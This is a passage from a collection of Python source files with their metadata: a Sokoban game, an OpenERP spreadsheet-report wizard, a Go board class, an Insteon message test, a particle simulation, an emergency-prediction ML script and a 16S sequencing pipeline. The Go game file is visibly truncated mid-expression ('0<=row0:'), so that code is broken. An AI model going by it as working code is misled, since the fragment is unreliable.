\"A\":\n dx = -1\n print(\"Left\")\n \n elif move == \"D\":\n dx = 1\n print(\"Right\")\n\n elif move == \"E\":\n print(\"Exit game\")\n playing = False\n\n else :\n print(\"Pls push W A S D - End game\")\n playing = False\n break\n \n\n move_on = True\n if 0 <= player[\"x\"] + dx < map_sokoban[\"size_x\"] \\\n and 0 <= player[\"y\"] + dy < map_sokoban[\"size_y\"]:\n\n #box move\n for box in boxes:\n \n \n if player[\"x\"] + dx == box[\"x\"] and player[\"y\"] + dy == box[\"y\"]:\n if 0 <= (box[\"x\"] + dx) < map_sokoban[\"size_x\"]\\\n and 0 <= (box[\"y\"]) + dy < map_sokoban[\"size_y\"]:\n move_on = True\n else:\n move_on = False\n\n for wall in walls:\n if box[\"x\"] + dx == wall[\"x\"] and box[\"y\"]+ dy == wall[\"y\"]:\n move_on = False\n\n for box2 in boxes:\n if box[\"x\"] + dx == box2[\"x\"] and box[\"y\"] + dy == box2[\"y\"]:\n move_on = False\n if move_on == True :\n box[\"x\"] += dx\n box[\"y\"] += dy\n \n\n #spceial item \n if player[\"x\"] == special_item[\"x\"] and player[\"y\"] == special_item[\"y\"]:\n special_item = { \"x\": -1, \"y\": -1 }\n\n walls = [{ \"x\": -1, \"y\": -1},]\n spc = True\n \n \n #player move \n for wall in walls:\n if player[\"x\"] + dx == wall[\"x\"] and player[\"y\"] + dy == wall[\"y\"]:\n move_on = False \n\n if move_on == True:\n player[\"x\"] += dx\n player[\"y\"] += dy\n \n\n #Check win\n win = True\n for box in boxes:\n if box not in destinations:\n win = False\n\n if win is True:\n print(\"You win !\")\n playing = False\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n # if 0 <= player[\"x\"] + dx < map_sokoban[\"size_x\"] \\\n # and 0 <= player[\"y\"] + dy < map_sokoban[\"size_y\"] :\n # 
player[\"x\"] += dx\n # player[\"y\"] += dy\n\n # #Move box\n # dichuyen = True\n # for box in boxes:\n # if box[\"x\"] == player[\"x\"] and box[\"y\"] == player[\"y\"]:\n # box[\"x\"] += dx\n # box[\"y\"] += dy \n \n # if player['x'] + dx == box['x'] and player['y'] + dy == box['y']:\n # if 0 <= (box['x'] + dx) < map_sokoban['size_x']\\\n # and 0 <= (box['y']) + dy) < map_sokoban['size_y']:\n # dichuyen = False\n \n \n \n\n\n #Check win\n win = True\n for box in boxes:\n if box not in destinations:\n win = False\n\n if win is True:\n print(\"You win !\")\n playing = False\n\n\n ","sub_path":"Session 5/sokoban/sokoban.py","file_name":"sokoban.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"575577035","text":"# -*- coding: utf-8 -*-\nfrom openerp.osv import fields, osv, orm\nfrom tempfile import NamedTemporaryFile\nfrom openpyxl import Workbook\nfrom openpyxl.styles import Border, Side, Font\nimport base64\nfrom openerp.tools.translate import _\n\n\nclass elote_financial_report_wizard(osv.osv_memory):\n _name = \"elote.financial.report.wizard\"\n _description = \"Financial report\"\n\n def _default_lot(self, cr, uid, ids, context=None):\n lot_obj = self.pool.get('elote.lote')\n open_lot_ids = lot_obj.search(cr, uid, [('state', '=', 'open')])\n return open_lot_ids and open_lot_ids[0] or False\n\n _columns = {\n 'lot_id': fields.many2one('elote.lote', string='Lot'),\n 'name': fields.char('File Name', readonly=True),\n 'data': fields.binary('File', readonly=True),\n 'state': fields.selection([('choose', 'choose'), # choose lot and supplier\n ('get', 'get')]) # get the file\n }\n\n _defaults = {\n 'state': 'choose',\n 'lot_id': _default_lot,\n }\n\n def generate_file(self, cr, uid, ids, context=None):\n if context is None:\n context = {}\n this = self.browse(cr, uid, ids)[0]\n form_data = self.read(cr, uid, ids, ['lot_id'])[0]\n\n lot = form_data['lot_id'][0]\n lote_obj = self.pool.get(\"elote.lote\").browse(cr, uid, lot, context=context)[0]\n\n messages_en = {\n 'Summary for approval': 'Summary for approval',\n 'Approved purchase orders by biblical society': 'Approved purchase orders by biblical society',\n 'Biblical Society': 'Biblical Society',\n 'Quantity': 'Quantity',\n 'Amount': 'Amount',\n 'Status': 'Status',\n 'Orders for approval': 'Orders for approval',\n 'Supplier': 'Supplier',\n 'Ref': 'Ref',\n 'ISBN': 'ISBN',\n 'Description': 'Description',\n 'Order Total': 'Order Total',\n 'Supplier Total': 'Supplier Total',\n 'BS Total': 'BS Total',\n 'draft': 'Draft PO',\n 'approved': 'Approved',\n 'confirmed': 'Waiting Approval',\n 'except_picking': 'Shipping Exception',\n 'except_invoice': 'Invoice Exception',\n 'dispatched': 'Dispatched',\n 'done': 'Done',\n 'consolidated': 'Consolidated',\n 'cancel': 'Cancelled',\n 'eLote Financial Report - ': 'eLote Financial Report - ',\n }\n messages_es = {\n 'Summary for approval': u'Resumen para aprobación',\n 'Approved purchase orders by biblical society': u'Órdenes de compra para aprobación por sociedad bíblica',\n 'Biblical Society': u'Sociedad Bíblica',\n 'Quantity': u'Cantidad',\n 'Amount': u'Monto',\n 'Status': u'Estado',\n 'Orders for approval': u'Órdenes para aprobación',\n 'Supplier': u'Centro de producción',\n 'Ref': u'# Orden',\n 'ISBN': u'ISBN',\n 'Description': u'Descripción',\n 'Order Total': u'Total Orden',\n 'Supplier Total': u'Total CP',\n 'BS Total': u'Total SB',\n 'draft': u'En borrador',\n 'approved': u'Aprobada',\n 'confirmed': u'Pendiente aprobación',\n 'except_picking': u'Excepción de envío',\n 'except_invoice': u'Excepción de facturación',\n 'dispatched': u'Despachada',\n 'done': 'Entregada',\n 'consolidated': u'Consolidada',\n 'cancel': u'Cancelada',\n 'eLote Financial Report - ': u'Reporte financiero eLote - ',\n }\n\n if self.pool.get('res.users').browse(cr, uid, uid).lang == 'es_ES':\n m = messages_es\n else:\n m = messages_en\n\n fileobj = NamedTemporaryFile('w+b')\n xlsfile = fileobj.name\n fileobj.close()\n\n border_top = Border(top=Side(style='thin'))\n border_bottom = Border(bottom=Side(style='thin'))\n font_bold = Font(bold=True)\n font_h1 = Font(size=18, bold=True)\n font_h2 = Font(size=14, bold=True)\n\n wb = Workbook()\n\n ws = wb.active\n ws.title = m['Summary for approval']\n\n row = 1\n 
ws.cell(row=row, column=1).value = m['Approved purchase orders by biblical society']\n ws.cell(row=row, column=1).font = font_h1\n\n row += 1\n ws.cell(row=row, column=1).value = lote_obj.name\n ws.cell(row=row, column=1).font = font_h2\n\n row += 1\n ws.cell(row=row, column=1).value = m['Biblical Society']\n ws.cell(row=row, column=2).value = m['Quantity']\n ws.cell(row=row, column=3).value = m['Amount']\n ws.cell(row=row, column=4).value = m['Status']\n for col_count in xrange(1, 5):\n ws.cell(row=row, column=col_count).font = font_bold\n ws.cell(row=row, column=col_count).border = border_bottom\n\n sql = \"\"\"\n SELECT s.name, sum(l.product_qty) AS quantity, sum(l.product_qty * l.price_unit_taxed) AS amount,\n CASE max(o.state)\n WHEN 'draft' THEN '\"\"\" + m['draft'] + \"\"\"'\n WHEN 'approved' THEN '\"\"\" + m['approved'] + \"\"\"'\n WHEN 'confirmed' THEN '\"\"\" + m['confirmed'] + \"\"\"'\n WHEN 'dispatched' THEN '\"\"\" + m['dispatched'] + \"\"\"'\n WHEN 'done' THEN '\"\"\" + m['done'] + \"\"\"'\n WHEN 'cancel' THEN '\"\"\" + m['cancel'] + \"\"\"'\n ELSE max(o.state) END\n AS status\n FROM purchase_order o\n JOIN res_users u\n ON u.id = o.create_uid\n JOIN res_partner p\n ON p.id = u.partner_id\n JOIN res_partner s\n ON s.id = p.parent_id\n AND s.customer\n JOIN purchase_order_line l\n ON l.order_id = o.id\n WHERE o.lote_id = %s\n AND o.state = 'confirmed'\n GROUP BY s.name\n ORDER BY s.name\n \"\"\"\n\n row += 1\n first_row = row\n cr.execute(sql, (lot,))\n for order_line in cr.dictfetchall():\n ws.cell(row=row, column=1).value = order_line['name']\n ws.cell(row=row, column=2).value = order_line['quantity']\n ws.cell(row=row, column=3).value = order_line['amount']\n ws.cell(row=row, column=4).value = order_line['status']\n ws.cell(row=row, column=2).number_format = '#,##0'\n ws.cell(row=row, column=3).number_format = '$#,##0.00'\n row += 1\n if row > first_row:\n ws.cell(row=row, column=2).value = \"=SUM(B\" + str(first_row) + \":B\" + str(row - 1) + \")\"\n ws.cell(row=row, column=2).number_format = '#,##0'\n ws.cell(row=row, column=3).value = \"=SUM(C\" + str(first_row) + \":C\" + str(row - 1) + \")\"\n ws.cell(row=row, column=3).number_format = '$#,##0.00'\n for col_count in xrange(1, 5):\n ws.cell(row=row, column=col_count).font = font_bold\n ws.cell(row=row, column=col_count).border = border_top\n\n ws2 = wb.create_sheet(title=m['Orders for approval'])\n row = 1\n ws2.cell(row=row, column=1).value = m['Approved purchase orders by biblical society']\n ws2.cell(row=row, column=1).font = font_h1\n\n row += 1\n ws2.cell(row=row, column=1).value = lote_obj.name\n ws2.cell(row=row, column=1).font = font_h2\n\n row += 1\n ws2.cell(row=row, column=1).value = m['Biblical Society']\n ws2.cell(row=row, column=2).value = m['Supplier']\n ws2.cell(row=row, column=3).value = m['Ref']\n ws2.cell(row=row, column=4).value = m['ISBN']\n ws2.cell(row=row, column=5).value = m['Description']\n ws2.cell(row=row, column=6).value = m['Quantity']\n ws2.cell(row=row, column=7).value = m['Amount']\n ws2.cell(row=row, column=8).value = m['Status']\n ws2.cell(row=row, column=9).value = m['Order Total']\n ws2.cell(row=row, column=10).value = m['Supplier Total']\n ws2.cell(row=row, column=11).value = m['BS Total']\n for col_count in xrange(1, 12):\n ws2.cell(row=row, column=col_count).font = font_bold\n ws2.cell(row=row, column=col_count).border = border_bottom\n\n sql = \"\"\"\n SELECT s.name, c.name AS supplier, o.name as ref, i.default_code as isbn, l.name AS description, l.product_qty AS quantity,\n 
l.product_qty * l.price_unit_taxed AS amount,\n CASE o.state\n WHEN 'draft' THEN '\"\"\" + m['draft'] + \"\"\"'\n WHEN 'approved' THEN '\"\"\" + m['approved'] + \"\"\"'\n WHEN 'confirmed' THEN '\"\"\" + m['confirmed'] + \"\"\"'\n WHEN 'dispatched' THEN '\"\"\" + m['dispatched'] + \"\"\"'\n WHEN 'done' THEN '\"\"\" + m['done'] + \"\"\"'\n WHEN 'cancel' THEN '\"\"\" + m['cancel'] + \"\"\"'\n ELSE o.state END\n AS status\n FROM purchase_order o\n JOIN res_partner c\n ON c.id = o.partner_id\n JOIN res_users u\n ON u.id = o.create_uid\n JOIN res_partner p\n ON p.id = u.partner_id\n JOIN res_partner s\n ON s.id = p.parent_id\n AND s.customer\n JOIN purchase_order_line l\n ON l.order_id = o.id\n JOIN product_product i\n ON i.id = l.product_id\n WHERE o.lote_id = %s\n AND o.state <> 'cancel'\n ORDER BY s.name, c.name, o.name, l.id\n \"\"\"\n\n ref = ''\n supplier = ''\n bs = ''\n row += 1\n first_row = row\n first_row_ref = row\n first_row_sup = row\n first_row_bs = row\n cr.execute(sql, (lot,))\n for order_line in cr.dictfetchall():\n if order_line['name'] != bs:\n if bs != '':\n ws2.cell(row=row - 1, column=11).value = \"=SUM(G\" + str(first_row_bs) + \":G\" + str(row - 1) + \")\"\n ws2.cell(row=row - 1, column=11).font = font_bold\n ws2.cell(row=row - 1, column=11).number_format = '$#,##0.00'\n first_row_bs = row\n if order_line['supplier'] != supplier or order_line['name'] != bs:\n if supplier != '':\n ws2.cell(row=row - 1, column=10).value = \"=SUM(G\" + str(first_row_sup) + \":G\" + str(row - 1) + \")\"\n ws2.cell(row=row - 1, column=10).font = font_bold\n ws2.cell(row=row - 1, column=10).number_format = '$#,##0.00'\n first_row_sup = row\n if order_line['ref'] != ref or order_line['supplier'] != supplier or order_line['name'] != bs:\n if ref != '':\n ws2.cell(row=row - 1, column=9).value = \"=SUM(G\" + str(first_row_ref) + \":G\" + str(row - 1) + \")\"\n ws2.cell(row=row - 1, column=9).font = font_bold\n ws2.cell(row=row - 1, column=9).number_format = '$#,##0.00'\n first_row_ref = row\n bs = order_line['name']\n supplier = order_line['supplier']\n ref = order_line['ref']\n ws2.cell(row=row, column=1).value = order_line['name']\n ws2.cell(row=row, column=2).value = order_line['supplier']\n ws2.cell(row=row, column=3).value = order_line['ref']\n ws2.cell(row=row, column=4).value = order_line['isbn']\n ws2.cell(row=row, column=5).value = order_line['description']\n ws2.cell(row=row, column=6).value = order_line['quantity']\n ws2.cell(row=row, column=7).value = order_line['amount']\n ws2.cell(row=row, column=8).value = order_line['status']\n ws2.cell(row=row, column=6).number_format = '#,##0'\n ws2.cell(row=row, column=7).number_format = '$#,##0.00'\n row += 1\n if row > first_row:\n if ref != '':\n ws2.cell(row=row - 1, column=9).value = \"=SUM(G\" + str(first_row_ref) + \":G\" + str(row - 1) + \")\"\n ws2.cell(row=row - 1, column=9).font = font_bold\n ws2.cell(row=row - 1, column=9).number_format = '$#,##0.00'\n ref = order_line['ref']\n first_row_ref = row\n if supplier != '':\n ws2.cell(row=row - 1, column=10).value = \"=SUM(G\" + str(first_row_sup) + \":G\" + str(row - 1) + \")\"\n ws2.cell(row=row - 1, column=10).font = font_bold\n ws2.cell(row=row - 1, column=10).number_format = '$#,##0.00'\n supplier = order_line['supplier']\n first_row_sup = row\n if bs != '':\n ws2.cell(row=row - 1, column=11).value = \"=SUM(G\" + str(first_row_bs) + \":G\" + str(row - 1) + \")\"\n ws2.cell(row=row - 1, column=11).font = font_bold\n ws2.cell(row=row - 1, column=11).number_format = '$#,##0.00'\n bs = 
order_line['name']\n first_row_bs = row\n ws2.cell(row=row, column=6).value = \"=SUM(F\" + str(first_row) + \":F\" + str(row - 1) + \")\"\n ws2.cell(row=row, column=6).number_format = '#,##0'\n ws2.cell(row=row, column=7).value = \"=SUM(G\" + str(first_row) + \":G\" + str(row - 1) + \")\"\n ws2.cell(row=row, column=7).number_format = '$#,##0.00'\n ws2.cell(row=row, column=9).value = \"=SUM(I\" + str(first_row) + \":I\" + str(row - 1) + \")\"\n ws2.cell(row=row, column=9).number_format = '$#,##0.00'\n ws2.cell(row=row, column=10).value = \"=SUM(J\" + str(first_row) + \":J\" + str(row - 1) + \")\"\n ws2.cell(row=row, column=10).number_format = '$#,##0.00'\n ws2.cell(row=row, column=11).value = \"=SUM(K\" + str(first_row) + \":K\" + str(row - 1) + \")\"\n ws2.cell(row=row, column=11).number_format = '$#,##0.00'\n for col_count in xrange(1, 12):\n ws2.cell(row=row, column=col_count).font = font_bold\n ws2.cell(row=row, column=col_count).border = border_top\n\n wb.save(filename=xlsfile)\n\n spreadsheet_file = open(xlsfile, \"rb\")\n binary_data = spreadsheet_file.read()\n spreadsheet_file.close()\n out = base64.b64encode(binary_data)\n self.write(cr, uid, ids, {\n 'state': 'get',\n 'name': m['eLote Financial Report - '] + lote_obj.name + \".xlsx\",\n 'data': out\n }, context=context)\n return {\n 'type': 'ir.actions.act_window',\n 'res_model': 'elote.financial.report.wizard',\n 'view_mode': 'form',\n 'view_type': 'form',\n 'res_id': this.id,\n 'views': [(False, 'form')],\n 'target': 'new',\n }\n","sub_path":"elote_statistics/wizard/elote_financial_report_wizard.py","file_name":"elote_financial_report_wizard.py","file_ext":"py","file_size_in_byte":14697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"27524441","text":"\n\nclass Game:\n\n def __init__(self, dim, n_player):\n self.board = [[None]*dim for i in range(dim)]\n self.current_player = 0\n self.dimension = dim\n self.n_player = n_player\n\n def in_bounds(self, row, col):\n \"\"\"Returns True if row and column are within the board\"\"\"\n return 0<=row0:\n c = to_visit.pop()\n visited.add(c)\n yield c\n for i in self.neighbours(row, col):\n if i not in visited and self.board[i[0]][i[1]]==self.board[row][col]:\n to_visit.append(i)\n\n def clear_group(self, row, col):\n \"\"\"Removes a group from the board replacing it with empty spaces\"\"\"\n for i in self.group(row, col):\n self.board[i[0]][i[1]]=None\n\n def is_group_dead(self, row, col):\n \"\"\"Returns True if group at row, col is dead i.e. it doesn't have any\n free spaces around itself\"\"\"\n if not self.in_bounds(row, col):\n raise ValueError(\"Position is outside of the board\")\n if self.board[row][col] is None:\n return False\n\n for i in self.group(row, col):\n for j in self.neighbours(*i):\n if self.board[j[0]][j[1]] is None:\n return False\n return True\n\n def __str__(self):\n r = \"A {0}x{0} game with {1} players. Player {2} plays next \\n\".format(\n self.dimension, self.n_player, self.current_player)\n for i in self.board:\n for j in i:\n if j is None:\n r+='.'\n else:\n r+=chr(ord('0')+j)\n r+='\\n'\n return r\n","sub_path":"pygo/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"542057430","text":"\"\"\"Test All-Link Cleanup Failure Report.\"\"\"\nimport unittest\nfrom binascii import unhexlify\n\nfrom pyinsteon.address import Address\nfrom pyinsteon.constants import MessageId\n\n# pylint: disable=unused-import\n# flake8: noqa: F401\nfrom pyinsteon.handlers.all_link_cleanup_failure_report import (\n AllLinkCleanupFailureReport,\n)\nfrom tests import set_log_levels\nfrom tests.utils import hex_to_inbound_message\n\n\nclass TestAllLinkCleanupFailureReport(unittest.TestCase):\n \"\"\"Test All-Link Cleanup Failure Report.\"\"\"\n\n def setUp(self):\n \"\"\"Set up test.\"\"\"\n self.hex = \"02560304050607\"\n self.message_id = MessageId(0x56)\n self.error = int(0x03)\n self.group = int(0x04)\n self.address = Address(\"050607\")\n\n self.msg, self.msg_bytes = hex_to_inbound_message(self.hex)\n set_log_levels(\n logger=\"info\",\n logger_pyinsteon=\"info\",\n logger_messages=\"info\",\n logger_topics=False,\n )\n\n def test_id(self):\n \"\"\"Test Id.\"\"\"\n assert self.msg.message_id == self.message_id\n\n def test_bytes(self):\n \"\"\"Test bytes.\"\"\"\n assert bytes(self.msg) == unhexlify(self.hex)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/test_messages/test_inbound/test_all_link_cleanup_failure_report.py","file_name":"test_all_link_cleanup_failure_report.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"329204293","text":"from matplotlib.patches import Circle\nimport numpy as np\nimport random\n\n# MAX_X = 30\n# MAX_Y = 30\n# PARTICLES_AMOUNT = 1\n# FRAMES = 1000\n# FPS = 100\n\n\nclass Particle:\n\n def __init__(self, x, y, max_x, max_y):\n self.max_x = max_x\n self.max_y = max_y\n self.radius = 0.5\n self.right_movements = 0\n self.left_movements = 0\n self.up_movements = 0\n self.down_movements = 0\n self.r = np.array((x, y))\n\n\n @property\n def x(self):\n return self.r[0]\n\n @x.setter\n def x(self, value):\n self.r[0] = value\n\n @property\n def y(self):\n return self.r[1]\n\n @y.setter\n def y(self, value):\n self.r[1] = value\n\n def draw(self, ax):\n circle = Circle(xy=self.r, radius=self.radius)\n ax.add_patch(circle)\n return circle\n\n def out_of_boundery(self, step):\n next_r = self.r + step\n\n if next_r[0] + self.radius >= self.max_x or next_r[0] - self.radius < -self.max_x or next_r[1] + self.radius >= self.max_y \\\n or next_r[1] - self.radius < -self.max_y:\n return True\n return False\n\n def advance(self):\n random_value = random.uniform(0, 1)\n step = np.array((0, 0))\n\n if random_value < 0.25:\n step = np.array((1, 0))\n self.up_movements += 1\n elif random_value < 0.5:\n step = np.array((0, -1))\n self.down_movements += 1\n elif random_value < 0.75:\n step = np.array((-1, 0))\n self.left_movements += 1\n else:\n step = np.array((0, 1))\n self.right_movements += 1\n\n if not self.out_of_boundery(step):\n self.r += step\n","sub_path":"75.26 - Simulación/TP/TP1/Código/ejercicio_10/particle.py","file_name":"particle.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"282754573","text":"import os\nimport argparse\nimport numpy as np\nimport pandas as pd\nfrom metrics import eval_metrics, C_lst\n\n\n\ndef load_data(in_dir):\n data = np.load(in_dir)\n print('Loaded Emergency NYC data.. \\n Shape:', data.shape)\n\n # historical avg. - categorical occurence rate\n print('Historical occur rate:')\n ha = []\n\n for c in range(data.shape[-1]):\n neg, pos = np.bincount(data[:, :, :, c].flatten())\n occur_rate = pos / (neg + pos)\n ha.append(occur_rate)\n print(f' {C_lst[c]}: {round(occur_rate, 2) * 100}% (supports {pos})')\n\n return data, ha\n\n\ndef split_data(data, dates, delta_t):\n assert len(dates) == 4, 'Invalid dates input.. Please input a sequence with four items.' \\\n ' Input example: -date 20150101 20150531 20150601 20150630'\n train_start, train_end, test_start, test_end = dates # unpack dates\n day_timestep = int(24/delta_t) # number of timesteps per day\n\n dates_range = pd.date_range('20150101', '20151231').strftime('%Y%m%d').tolist() # date range covers entire dataset\n assert len(dates_range) == int(data.shape[0]/day_timestep)\n\n # train set\n start_index, end_index = dates_range.index(train_start), dates_range.index(train_end)\n trainSet = data[start_index*day_timestep:(end_index+1)*day_timestep]\n print(f'Train set {train_start}-{train_end}: {trainSet.shape}')\n # test set\n start_index, end_index = dates_range.index(test_start), dates_range.index(test_end)\n testSet = data[start_index*day_timestep:(end_index+1)*day_timestep]\n print(f'Test set {test_start}-{test_end}: {testSet.shape} \\n')\n\n return trainSet, testSet\n\n\ndef run_model(model_name, model_dir, trainSet, testSet, timestep):\n print(f'Running model {model_name}.. \\n Observing last {timestep} steps to predict next one step.')\n if model_name == 'VAR':\n from baseline.VAR import run_VAR\n y_true, y_pred = run_VAR(model_dir, trainSet, testSet, timestep)\n\n elif model_name == 'LR':\n from baseline.LR import run_LR\n y_true, y_pred = run_LR(model_dir, trainSet, testSet, timestep)\n\n elif model_name == 'LASSO':\n from baseline.LASSO import run_LASSO\n y_true, y_pred = run_LASSO(model_dir, trainSet, testSet, timestep)\n\n elif model_name == 'SVM':\n from baseline.SVM import run_SVM\n y_true, y_pred = run_SVM(model_dir, trainSet, testSet, timestep)\n\n else:\n raise Exception('Unknown model name..')\n\n return y_true, y_pred\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Run ML models for emergency prediction')\n parser.add_argument('-in', '--in_dir', type=str, help='Input directory', default='../data')\n parser.add_argument('-model', '--model_name', type=str, help='Choose prediction model',\n choices=['LR', 'VAR', 'LASSO', 'SVM'], default='LR')\n parser.add_argument('-t', '--delta_t', type=int, default=4, help='Time interval in hour(s)')\n parser.add_argument('-l', '--seq_len', type=int, default=9, help='Sequence length of observation steps')\n parser.add_argument('-date', '--dates', type=str, nargs='+',\n help='Start/end dates of train/test sets. 
Test follows train.'\n ' Example: -date 20150101 20150531 20150601 20150630',\n default=['20150101', '20150531', '20150601', '20150630'])\n\n args = parser.parse_args()\n\n # input dir\n in_dir = os.path.join(args.in_dir, f'{args.delta_t}h', 'EmergNYC_bi_20x10.npy')\n # output dir\n out_dir = os.path.join('./baseline', args.model_name)\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\n # load data\n data, ha = load_data(in_dir)\n\n # split train/test sets\n trainSet, testSet = split_data(data, args.dates, args.delta_t)\n\n # run model\n y_true, y_pred = run_model(args.model_name, out_dir, trainSet, testSet, args.seq_len)\n\n # evaluate prediction performance\n eval_metrics(out_dir, args.dates[-2:], y_true, y_pred, ha)\n","sub_path":"model/main_ml.py","file_name":"main_ml.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"286915444","text":"\"\"\"\n\nOVERVIEW: \n\nScript to convert raw 16S sequencing data into OTU tables. Acts on a directory containing a summary file and the raw data.\nOutputs a directory with processing results.\n\n\"\"\"\n\nfrom __future__ import print_function\nfrom optparse import OptionParser\nimport numpy as np\nimport os, sys\nimport os.path\nimport math\nfrom string import ascii_lowercase\nimport multiprocessing as mp\nimport ntpath\nimport preprocessing_16S as OTU\nimport Formatting as frmt\nfrom CommLink import *\nfrom SummaryParser import *\nfrom Features import *\nimport pickle\nimport QualityControl as QC\n\n# Read in arguments for the script\nusage = \"%prog -i INPUT_DIR -o OUTPUT_DIR_FULLPATH\"\nparser = OptionParser(usage)\nparser.add_option(\"-i\", \"--input_dir\", type=\"string\", dest=\"input_dir\")\nparser.add_option(\"-o\", \"--output_dir\", type=\"string\", dest=\"output_dir\")\nparser.add_option(\"-p\", \"--primers_removed\", dest=\"primers_removed\", default='False')\nparser.add_option(\"-b\", \"--split_by_barcodes\", dest=\"split_by_barcodes\", default='False')\nparser.add_option(\"-m\", \"--multiple_files\", dest=\"multiple_raw_files\", default='False')\n(options, args) = parser.parse_args()\n\nif( not options.input_dir ):\n parser.error(\"No data directory specified.\")\n\n# Parse summary file\nsummary_file = options.input_dir + '/summary_file.txt'\nsummary_obj = SummaryParser(summary_file)\nsummary_obj.ReadSummaryFile()\ndataset_ID = summary_obj.datasetID\n\n# Pipe stdout and stderr to logfiles in the new directory\nsys.stdout = open('/home/ubuntu/logs/stdout_' + dataset_ID + '_proc_16S.log','w')\nsys.stderr = open('/home/ubuntu/logs/stderr_' + dataset_ID + '_proc_16S.log','w')\ndef warning(*objs):\n print(\"WARNING: \", *objs, file=sys.stderr)\n\n# Check for presence of metadata map - report if metadata is missing.\ntry:\n metadata_file = summary_obj.attribute_value_16S['METADATA_FILE']\nexcept:\n metadata_file = None\n warning(\"No metadata file found!! This will cause problems downstream...\")\n\n# If no output directory specified, default to $home/proc/\nhomedir = os.getenv(\"HOME\")\nif( not options.output_dir ):\n print(\"No output directory name specified. Writing to \" + homedir + \"/proc/ by default.\")\n options.output_dir = homedir + '/proc/' + dataset_ID + '_proc_16S'\n\n# Make a directory for the 16S processing results \nworking_directory = options.output_dir\ntry:\n os.system('mkdir ' + working_directory)\nexcept:\n print(\"Processing directory for this dataset already exists. Overwriting its contents.\")\n\n# If OTU clustering is to be performed, check for whether percent similarity was specified in summary file\ntry: \n similarity = float(summary_obj.attribute_value_16S['OTU_SIMILARITY'])\nexcept:\n similarity = 97.0\n\n\n# Extract file locations\nprimers_file = options.input_dir + '/' + summary_obj.attribute_value_16S['PRIMERS_FILE']\nbarcodes_map = options.input_dir + '/' + summary_obj.attribute_value_16S['BARCODES_MAP']\ntry:\n raw_data_file = options.input_dir + '/' + summary_obj.attribute_value_16S['RAW_FASTQ_FILE']\n raw_file_type = 'FASTQ'\nexcept:\n print(\"No single raw FASTQ file found. Checking for raw FASTA.\")\n try:\n raw_data_file = options.input_dir + '/' + summary_obj.attribute_value_16S['RAW_FASTA_FILE']\n raw_file_type = 'FASTA'\n except:\n print(\"No single raw FASTA file found either. 
Checking for multiple files.\")\n try:\n raw_data_summary_file = os.path.join(options.input_dir, summary_obj.attribute_value_16S['RAW_FASTQ_FILES'])\n raw_file_type = 'FASTQ'\n except:\n print(\"No filename of multiple raw FASTQs map provided. Check contents of your raw data and summary file.\")\n raise NameError(\"Unable to retrieve raw sequencing files.\")\n\n# Construct output filenames from dataset ID\nfastq_trimmed_qual = working_directory + '/' + dataset_ID + '.raw_trimmed_qual.fastq'\nfasta_trimmed = working_directory + '/' + dataset_ID + '.raw_trimmed.fasta'\nfastq_trimmed_length = working_directory + '/' + dataset_ID + '.raw_length_trimmed.fastq'\nfastq_trimmed_primers = working_directory + '/' + dataset_ID + '.raw_primers_trimmed.fastq'\nfastq_split_by_barcodes = working_directory + '/' + dataset_ID + '.raw_split_by_barcodes.fastq'\nfasta_dereplicated = working_directory + '/' + dataset_ID + '.raw_dereplicated.fasta'\ndereplication_map = working_directory + '/' + dataset_ID + '.dereplication_map'\n\nOTU_clustering_results = working_directory + '/' + dataset_ID + '.otu_clustering.' + str(int(similarity)) + '.tab'\nOTU_table = working_directory + '/' + dataset_ID + '.otu_table.' + str(int(similarity))\nOTU_sequences_fasta = working_directory + '/' + dataset_ID + '.otu_seqs.' + str(int(similarity)) + '.fasta'\nOTU_sequences_table = working_directory + '/' + dataset_ID + '.otu_seqs.' + str(int(similarity)) + '.table'\noligotype_table_filename = working_directory + '/' + dataset_ID + '.oligotype_table.' + str(int(similarity)) + '.classic'\n\n# Get ASCII encoding of FASTQ files\ntry:\n encoding = summary_obj.attribute_value_16S['ASCII_ENCODING']\nexcept:\n encoding = ''\n\nif(encoding == \"ASCII_BASE_33\"):\n print(\"ASCII 33 encoding for quality scores specified.\")\n ascii_encoding = 33\nelif(encoding == \"ASCII_BASE_64\"):\n print (\"ASCII 64 encoding for quality scores specified.\")\n ascii_encoding = 64\nelse:\n print (\"No ASCII encoding specified in the summary file for the quality scores in the FASTQ file. Using ASCII 64 as default.\")\n warning(\"No ASCII encoding specified in the summary file for the quality scores in the FASTQ file. Using ASCII 64 as default.\")\n ascii_encoding = 64\n\n\n# Parallel steps:\n# 1. split fastq into chunks\n# 2. demultiplex (sort by barcodes), remove primers, and trim, and convert to fasta format\n# 3. recombine into a single fasta file before dereplicating\n\nos.chdir(working_directory)\n\n\n# Checkpoint - single or multiple raw files? If multiple, the assumption is they are demultiplexed, where each raw file corresponds to a single sample's reads.\nif options.multiple_raw_files == 'False':\n\n # Step 1.1 - get raw data filesize, then split into ~10Mb pieces (100000 lines) if smaller than 100 Mb, or into ~100Mb pieces (1000000 lines) otherwise. 
